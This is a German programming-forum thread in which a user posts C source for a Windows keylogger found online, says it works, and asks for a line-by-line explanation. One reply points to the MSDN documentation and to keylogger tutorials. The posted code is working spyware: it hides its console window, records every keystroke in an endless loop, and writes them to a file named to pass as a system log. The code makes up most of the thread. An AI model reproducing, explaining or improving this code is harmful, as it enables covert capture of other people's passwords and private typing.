Offline Keylogger Codeerklärung



  • Ich habe diesen Code eines Keyloggers im Inet gefunden.

    #include <windows.h>
    #include <stdio.h>
    
    int main()
    {
      AllocConsole();
      ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
    
      FILE *Log;
      short key;
      char szKey[MAX_PATH];
      int scan;
    
      while(1)
      {
        Sleep(10);
        for(key=0;key<256;key++)
        {
          if(GetAsyncKeyState(key)==-32767)
          {
            scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0));
            GetKeyNameText(scan << 16,szKey,MAX_PATH);
            Log=fopen ("C:\WindowsSystemlog.txt","a+");
            fprintf(Log,"%s--",szKey);
            fclose(Log);
          }
        }
      }
    }
    

    Er funktioniert, aber ich werde aus dem Code nicht schlau. Also was da passiert.
    Kann mir jemand den Code Schritt für Schritt erklären, oder geht das schon in hohe C++ Gebiete?
    Ich hoffe es nicht verboten über Keylogger zu sprechen.



  • Dieser Thread wurde von Moderator/in HumeSikkins aus dem Forum C++ in das Forum WinAPI verschoben.

    Im Zweifelsfall bitte auch folgende Hinweise beachten:
    C/C++ Forum :: FAQ - Sonstiges :: Wohin mit meiner Frage?

    Dieses Posting wurde automatisch erzeugt.



  • Sylux schrieb:

    Kann mir jemand den Code Schritt für Schritt erklären, oder geht das schon in hohe C++ Gebiete?
    Ich hoffe es nicht verboten über Keylogger zu sprechen.

    nein, das ist eher C, dass sich aber in ewinapi gebiete erstreckt 😉
    den code kannst du dir eigentlich auch relativ einfach selbst erklären, wenn du nach den entsprechenden Funktionen googlest und dir die Beschreibungen zu den Funktionen in der MSDN durchliest 😉
    ansonsten kannst du dir auch mal ein, zwei keylogger tutorials ansehen, denn es gibt noch andere lösungenswege


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